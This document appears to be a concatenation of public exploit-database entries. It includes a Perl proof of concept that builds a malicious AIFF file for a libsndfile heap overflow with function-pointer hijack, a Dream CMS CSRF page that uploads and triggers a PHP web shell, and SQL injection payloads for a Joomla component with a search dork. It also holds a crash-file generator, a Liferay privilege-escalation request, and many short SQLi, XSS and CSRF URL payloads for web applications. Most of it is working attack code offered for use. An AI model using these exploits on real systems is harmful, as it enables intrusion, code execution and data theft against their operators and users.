# Starting program: /usr/bin/paplay nemux.aiff
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
# Program received signal SIGSEGV, Segmentation fault.
# [----------------------------------registers-----------------------------------]
# RAX: 0x41414141 ('AAAA')
# RBX: 0x60d3e0 --> 0x0
# RCX: 0x610a80 --> 0x0
# RDX: 0x44444444 ('DDDD')
# RSI: 0x1
# RDI: 0x7ea
# RBP: 0x36b0
# RSP: 0x7fffffffd958 --> 0x7ffff76cfe71 (pop rbx)
# RIP: 0x41414141 ('AAAA')
# ...
# [-------------------------------------code-------------------------------------]
# Invalid $PC address: 0x41414141
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x0000000041414141 in ?? ()
#########
##########################################################################################
my $header_aiff_c = "\x46\x4F\x52\x4D" . ### FORM and VERSION
"\x00\x00\xD0\x7C" .
"\x41\x49\x46\x43" .
"\x42\x56\x45\x52" .
"\x00\x00\x00\x04" .
"\xA2\x80\x51\x40" .
"\x43\x4F\x4D\x4D" . ### COMM Chunk and Compression NONE (PCM)
"\x00\x00\x00\x11" .
"\x00\x01\x00\x00" .
"\x00\x00\x00\x10" .
"\xF3\x0C\xFA\x00" .
"\x00\x00\x00\x00" .
"\x00\x00\x4E\x4F" .
"\x4E\x45\x0E\x6E" .
"\x6F\x74\x20\x63" .
"\x63\x6D\x92\x72" .
"\x65\x73\x53\x65\x64\x00" .
"\x53\x53\x4E\x44" . ### 2 SSND Chunks
"\x00\x00\x00\x40" .
"\x00\x00\x00\xAA" .
"\xBD\xBD\xC5\x58" .
"\xBD\x96\xCA\xB0" .
"\xE9\x6F\x0A\xFE" .
"\x24\xCD\x26\x65" .
"\x73\x73\x65\x64" .
"\x00\x53\x53\x4E" .
"\x44\x00\x00\x00" .
"\x40\x00\x00\x00" .
"\x00\xF8\x72\xF3" .
"\x59\xFB\x56\xFE" .
"\x00\x00\x00\x3E" .
"\xE9\x22\x66\x94" .
"\x4E\x66\x55\x94" .
"\x4E\xD4\xD7\xC5" .
"\x42\x49\x61\xC4" .
"\x43\x4F\x4D\x54" . ### 2 COMT Chunks
"\x00\x00\x00\x26" .
"\x00\x01\x00\x20" .
"\x68\x17\x0C\x10" .
"\x25\x03\x00\x10" . ### 0x2503 items
"\x03\x80\xFF\x37" .
"\x52\x00\x00\x00" .
"\x04\xA2\x8E\x51" .
"\x40\x43\x4F\x4D" .
"\x54\x00\x00\x0B" .
"\x26\x00\x01\x00" .
"\x20\x68" .
"\x17\x00\x10\x03" . ### Start wrong and junk chunks (they will trigger default block in the switch statement in aiff.c)
"\x03\x00\x10\x1B" .
"\x80\xFF\xFF\x4F" .
"\x4E\x45\x1F\x6E" . ### my debug: heap 0x161e0d8
"\x6F\x00\x01\x00" . ### my debug: heap 0x161e0dc
"\x00\xE4\x7F\x72" . ### ...
"\x00\x00\x00\xD7" .
"\xBA\x17\xFF\xE3" .
"\x1F\x40\xFF\x20" .
"\x18\x08\xDD\x18" .
"\x00\x28\x00\x28" .
"\x00\x28\x40\x28" .
"\x00\x28\x00\x28" .
"\x00\x28\xFF\xFF" .
"\xFF\x80\xF7\x17" .
"\x00\x18\x01\x00" .
"\x20\x68\x17\x0C" .
"\x10\x03\x03\x00" .
"\x10\x03\x80\xFF" .
"\xFF\x4F\x4E\x45" .
"\x0A\x6E\x70\x00" .
"\x18\xDE\x3A\x08" .
"\x00\x18\x21\xA6" .
"\x05\x7F\x40\x00" .
"\x08\xFF\x5D\x00" .
"\xF0\x00\x4F\x00" .
"\x6A\xFF\x89\x9D" .
"\xDA\x07\xB6\xFF" .
"\x2C\x92\xB3\x0D" .
"\xE4\x40\xBB\x23" .
"\x00\x18\x00\x38" .
"\x00\x63\x00\x28" .
"\x00\x90\xFF\xFF" .
"\x20\x18\x08\xDD" .
"\x18\x00\x28\x00" .
"\x28\x00\x5E\xFC" .
"\x78\xD9\xAD\xCD" .
"\x9E\x3E\xE9\x21" .
"\x55\x94\x4E\x85" .
"\x51\x94\x4E\xA6" .
"\xD7\xC5\x42\xA7" .
"\x2A\x55\xC4\x9F" .
"\x43\x4F\x4D\x54" . ### here start next COMT Chunk with 0x36B0 items
"\x08\x00\x00\x26" .
"\x00\x01\x00\x20" .
"\x68\x17\x0C\xDD" .
"\x36\xB0"; #### end of header...
my $file= "nemux.aiff";
if ($ARGV[0] eq "h" || $ARGV[0] eq "help") {
print "\n[*] POC for libsndfile <= 1.0.25 (latest version)\n";
print "[*] Heap overflow vulnerability\n";
print "[*] Author: Marco Romano (\@nemux_) - 07 Oct 2015 \n";
print "\n Just run " . $0 . " (output will be \"nemux.aiff\" file)\n\n";
exit 0;
}
my $eax_addr = 0x41414141;
my $edx_addr = 0x44444444;
#####
#### We are going to overwirte psf structure allocated in the heap
#####
my $content_file = pack('Q', $eax_addr);
$content_file .= "\x90" x ( 21146 - length pack('Q',$eax_addr) );
#####
### In the psf structure we will overwrite "int virtual_io" with a true value, and vio.seek function pointer
### with an arbitrary address.
### in this way the block below will be triggred in file_io.c:
### ...
### if (psf->virtual_io)
### return psf->vio.seek (...);
###
#####
my $rax_overwrite = pack('Q',$eax_addr); ### overwrite vio.seek pointer here
my $padding = "\x43" x 24; ### ....
my $rdx_overwrite = pack('Q',$edx_addr); ### overwrite rdx here ...
my $padding_end_file = "MOMIMANHACKERNOW" x 7; ### not useful but funny... -_-
print "\n[*] Making AIFF file: \"nemux.aiff\"";
my $payload = $header_aiff_c . $content_file . $rax_overwrite . $padding . $rdx_overwrite . $padding_end_file;
print "\n[*] Done... AIFF File Size: ".length($payload)."\n";
print "\nIs it over? ... Hello? ... Did we win? (cit.)\n";
open($FILE,">$file");
print $FILE $payload;
close($FILE);
print "\n[+] You can test it on OSX and Linux with Audacity - linux command line /usr/bin/audacity namux.aiff\n";
print "[+] You can test it on OSX Windows and Linux - with Adobe Audition";
print "\nNote: Adobe Audition will trigger the bug just when it scans the directory that contains this aiff file\n\n";
print "Marco Romano \@nemux_\n\n";
<!--
Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution
Vendor: Dream CMS
Product web page: http://www.dream-cms.kg
Affected version: 2.3.0
Summary: DreamCMS is open and completely free PHP web application
for constructing websites of any complexity.
Desc: Dream CMS allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a
logged-in user visits a malicious web site. Related to the CSRF issue, an
authenticated arbitrary PHP code execution exist. The vulnerability is caused
due to the improper verification of uploaded files in '/files-manager-administration/add-file'
script via the 'file' POST parameter which allows of arbitrary files being
uploaded in '/resource/filemanager/1/home/' where the admin first needs to add
the file extension in the allowed list (csrf'd). This can be exploited to execute
arbitrary PHP code by uploading a malicious PHP script file and execute system
commands.
Tested on: nginx/1.6.2
PHP/5.5.28
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5268
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5268.php
01.10.2015
-->
<html>
<head>
<title>Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution</title>
</head>
<body onload="exploitrun();">
<!-- 1. Add PHP allowed extension -->
<form name="addext" action="http://TARGET/pages/en/files-manager-administration/settings" method="POST" target="frame0">
<input type="hidden" name="form_name" value="settings" />
<input type="hidden" name="file_manager_allowed_extensions" value="bmp,gif,jpg,png,mp3,wav,wma,3g2,3gp,avi,flv,mov,mp4,mpg,swf,vob,wmv,zip,rar,txt,doc,docx,pdf,php" />
<input type="hidden" name="file_manager_allowed_size" value="2097152" />
<input type="hidden" name="file_manager_file_name_length" value="20" />
<input type="hidden" name="file_manager_image_extensions" value="bmp,gif,jpg,png" />
<input type="hidden" name="file_manager_media_extensions" value="mp3,wav,wma,3g2,3gp,avi,flv,mov,mp4,mpg,swf,vob,wmv" />
<input type="hidden" name="file_manager_window_width" value="60" />
<input type="hidden" name="file_manager_window_height" value="500" />
<input type="hidden" name="file_manager_window_image_height" value="300" />
<input type="hidden" name="submit" value="Save" />
</form>
<!-- 2. Upload PHP file -->
<script>
function upload()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://TARGET/pages/en/files-manager-administration/add-file?path=home", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuCEcIcPhpF3WD8Sv");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"form_name\"\r\n" +
"\r\n" +
"file\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"billy.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"system($_GET[\"cmd\"]);\r\n" +
"?\x3e\r\n" +
"\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Submit\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form name="uploadme" action="javascript:upload();" target="frame1">
</form>
<!-- 3. Code execution -->
<form name="exploit" action="http://TARGET/resource/filemanager/1/home/billy.php" method="GET" target="frame2">
<input type="hidden" name="cmd" value="whoami" />
</form>
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>
<script>
function exploitrun()
{
document.addext.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.uploadme.submit();
document.getElementsByTagName("iframe")[1].onload = function()
{
document.exploit.submit();
}
}
}
</script>
</body>
</html>
# Description of component:
This Joomla component is perfect for independent estate agents, property
rental companies and agencies, hotel booking, hotel manage, motel booking,
motel manage.
##################################################################################################
# Exploit Title: [Joomla component com_realestatemanager - SQL injection]
# Google Dork: [inurl:option=com_realestatemanager]
# Date: [2015-10-10]
# Exploit Author: [Omer Ramić]
# Vendor Homepage: [http://ordasoft.com/]
# Software Link: [http://ordasoft.com/Real-Estate-Manager-Software-Joomla.html]
# Version: [3.7] & probably all prior
#Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
##################################################################################################
#Multiple vulnerable parameters (POC given only for the first parametar):
Parameter_1: order_direction (POST)
Parameter_2: order_field (POST)
#The vulnerable parameters 1 & 2 are within the following request:
POST
/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://
[HOST]/index.php?option=com_realestatemanager&task=showCategory&catid=50&Itemid=132
Cookie: security_level=0;
9d929655f6556b9fb49bf0e118bafb11=tp72u418eemk6jdvvnctoamna0; countrytabs=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
order_direction=asc&order_field=price
#Vectors:
POC_1: order_direction=asc,(SELECT (CASE WHEN (7918=7918) THEN 1 ELSE
7918*(SELECT 7918 FROM INFORMATION_SCHEMA.CHARACTER_SETS)
END))&order_field=price
POC_2: order_direction=asc,(SELECT 1841 FROM(SELECT
COUNT(*),CONCAT(0x716b787671,(SELECT
(ELT(1841=1841,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&order_field=price
###################################
# Greets to Palestine from Bosnia #
###################################
#!/usr/bin/python
# Exploit Title: Tomabo MP4 Converter 3.10.12 - (.m3u) Denial of service (Crush application)
# Date: [8-10-2015]
# Exploit Author: [M.Ibrahim] vulnbug@gmail.com
# E-Mail: vulnbug <at> gmail.com
# Vendor Homepage: http://www.tomabo.com/mp4-converter/index.html
# Version: [3.10.12]
# Tested on: windows 7 x86
junk="A"*600000
file = "exploit.m3u"
f=open(file,"w")
f.write(junk);
f.close();
# Exploit Title: Liferay 6.1.0 CE GA1 Privilege Escalation
# Date: 18/05/2015
# Exploit Author: Massimo De Luca - mentat.is
# Vendor Homepage: https://www.liferay.com
# Software Link:
http://www.liferay.com/it/community/releases/-/asset_publisher/nSr2/content/id/18060360
# Version: 6.1.0 CE
# Tested on: -
Explanation:
Any logged user can change his "User Group" membership by editing the
parameter _2_userGroupsSearchContainerPrimaryKeys in the HTTP POST REQUEST
generated when updating his profile in the page "Manage my account". This
may lead to privilege escalation.
Proof of Concept:
POST
/group/control_panel/manage?p_auth=J3jbveH7&p_p_id=2&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&doAsGroupId=19&refererPlid=10839&controlPanelCategory=my&_2_struts_action=%2Fmy_account%2Fedit_user
HTTP/1.1
[...]
[...]_2_organizationsSearchContainerPrimaryKeys=&_2_groupsSearchContainerPrimaryKeys=19&_2_userGroupsSearchContainerPrimaryKeys=[NEW
GROUP ID]&_2_groupRolesRoleIds=[...]
For your reference i'm attaching the full request in a separate file.
In order to test the vulnerability on a fresh installation:
- Create two different groups with different roles and permissions (ie:
one with administrator permissions, and a regular user)
-Create two different users,one for each group
Solution:
The vendor is aware of the problem and has fixed the issue in newer
releases
#Massimo De Luca
#mdeluca [at] mentat.is
#Mentat.is
Hello, I want to report following exploit:
# Exploit Title: PHPMyLicense Stored Cross Site Scripting
# Date: 09-10-2015
# Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH
# Website: https://websec-test.com
# Vendor Homepage: https://phpmylicense.com
# Software Link: http://codecanyon.net/item/phpmylicense/11719122
# Version: 3.0.0 - 3.1.4 (REQUIRED)
# Category: Webapps
1.) Description:
Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.
2.) Proof of Concept:
localhost/phpmylicense/ajax/
POST:
comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense¶meters=bla&productid=20&serialkey=bla&status=processing
3.) Solution:
None. - No Update available for it.
source: https://www.securityfocus.com/bid/58976/info
Spiffy XSPF Player plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Spiffy XSPF Player 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/spiffy/playlist.php?playlist_id=[SQL]
source: https://www.securityfocus.com/bid/58911/info
PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/addressbook/register/user_add_save.php POST var email
source: https://www.securityfocus.com/bid/58911/info
PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/addressbook/register/edit_user.php?id={insert}
source: https://www.securityfocus.com/bid/58911/info
PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/addressbook/register/edit_user_save.php?id={insert}&lastname={insert}&firstname={insert}&phone={insert}&email={insert}&permissions={insert}¬es={insert}
source: https://www.securityfocus.com/bid/58911/info
PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/addressbook/register/linktick.php?site={insert}
source: https://www.securityfocus.com/bid/58911/info
PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/addressbook/register/reset_password.php?email={insert}&password={insert}
source: https://www.securityfocus.com/bid/58911/info
PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/addressbook/register/reset_password_save.php?username={insert}&password=&password_confirm=&password_hint={insert}&email={insert}
source: https://www.securityfocus.com/bid/58911/info
PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/addressbook/register/router.php COOKIE var BasicLogin
source: https://www.securityfocus.com/bid/58911/info
PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/addressbook/register/traffic.php?var={insert}
source: https://www.securityfocus.com/bid/58913/info
Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/aspell.php?disctionnary=><script>alert('foo');</script>
source: https://www.securityfocus.com/bid/58948/info
The Traffic Analyzer plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss]
source: https://www.securityfocus.com/bid/58945/info
EasyPHP is prone to an authentication bypass and a PHP code execution vulnerability.
Attackers may exploit these issues to gain unauthorized access to the affected application and perform arbitrary actions or execute arbitrary PHP code within the context of the web server process. Successful attacks can compromise the affected application and possibly the underlying computer.
EasyPHP 12.1 is vulnerable; other versions may also be affected.
http://www.example.com/home/index.php?to=ext
http://www.example.com/home/index.php?to=phpinfo
source: https://www.securityfocus.com/bid/58943/info
Multiple Foscam IP Cameras are prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
The following products are vulnerable:
Foscam FI8910W running Embedded Web Interface 2.4.10.3
Foscam FI8908W running Embedded Web Interface 2.4.10.3
http://www.example.com/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=
source: https://www.securityfocus.com/bid/55295/info
TomatoCart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
TomatoCart 1.1.7 is vulnerable; other versions may also be affected.
http://www.example.com/with/tomato/ext/secureimage/example_from.ajax.php/"></script><whatever.now>
source: https://www.securityfocus.com/bid/58911/info
PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/addressbook/register/admin_index.php?q={insert}
source: https://www.securityfocus.com/bid/58911/info
PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/addressbook/register/checklogin.php?username={insert}&password=pass